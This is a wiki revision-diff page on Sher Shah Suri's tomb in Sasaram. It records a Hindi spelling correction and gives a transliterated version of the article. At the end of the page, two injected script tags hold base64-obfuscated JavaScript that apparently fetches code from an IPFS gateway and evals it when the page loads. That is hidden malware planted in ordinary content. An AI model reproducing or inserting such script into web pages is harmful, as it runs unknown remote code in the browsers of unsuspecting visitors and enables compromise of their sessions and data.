Difference between revisions of "शेरशाह का मक़बरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:बिहार के पर्यटन स्थल (को हटा दिया गया हैं।))
m (Text replace - " साफ " to " साफ़ ")
 
Line 4: Line 4:
 
*उसके द्वारा ‘[[सासाराम]]’ में झील के अन्दर ऊँचे टीले पर निर्मित करवाया गया स्वयं का मक़बरा पूर्वकालीन स्थापत्य शैली की पराकाष्ठा तथा नवीन शैली के प्रारम्भ का द्योतक माना जाता है।  
 
*उसके द्वारा ‘[[सासाराम]]’ में झील के अन्दर ऊँचे टीले पर निर्मित करवाया गया स्वयं का मक़बरा पूर्वकालीन स्थापत्य शैली की पराकाष्ठा तथा नवीन शैली के प्रारम्भ का द्योतक माना जाता है।  
 
*'''शेरशाह सूरी का शहर''' [[बनारस]]-[[कोलकाता]] रोड पर [[सासाराम]] था। यहीं पर उसने अपने जीते जी अपना मक़बरा बनवाना शुरू कर दिया था।  
 
*'''शेरशाह सूरी का शहर''' [[बनारस]]-[[कोलकाता]] रोड पर [[सासाराम]] था। यहीं पर उसने अपने जीते जी अपना मक़बरा बनवाना शुरू कर दिया था।  
*मक़बरा पत्थरों से बना है। मक़बरे के सबसे ऊपरी सिरे से पूरे सासाराम का दृश्य साफ दिखाई देता है।
+
*मक़बरा पत्थरों से बना है। मक़बरे के सबसे ऊपरी सिरे से पूरे सासाराम का दृश्य साफ़ दिखाई देता है।
  
  

Latest revision as of 14:13, 29 January 2013

[[chitr:Shershah Tomb2.jpg|thumb|200px|sherashah soori ka maqabara, sasaram bihar]]

  • sasaram sthit sherashah ka maqabara, jo sherashah soori ne apane jivan-kal mean nirmit karavaya tha, sthapaty kala ka ek shanadar namoona mana jata hai.
  • ise poorvakalin sthapaty shaili aur bad mean vikasit sthapaty shaili ke praranbhik bindu ka mishran mana jata hai.
  • usake dvara ‘sasaram’ mean jhil ke andar ooanche tile par nirmit karavaya gaya svayan ka maqabara poorvakalin sthapaty shaili ki parakashtha tatha navin shaili ke prarambh ka dyotak mana jata hai.
  • sherashah soori ka shahar banaras-kolakata rod par sasaram tha. yahian par usane apane jite ji apana maqabara banavana shuroo kar diya tha.
  • maqabara pattharoan se bana hai. maqabare ke sabase oopari sire se poore sasaram ka drishy saf dikhaee deta hai.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>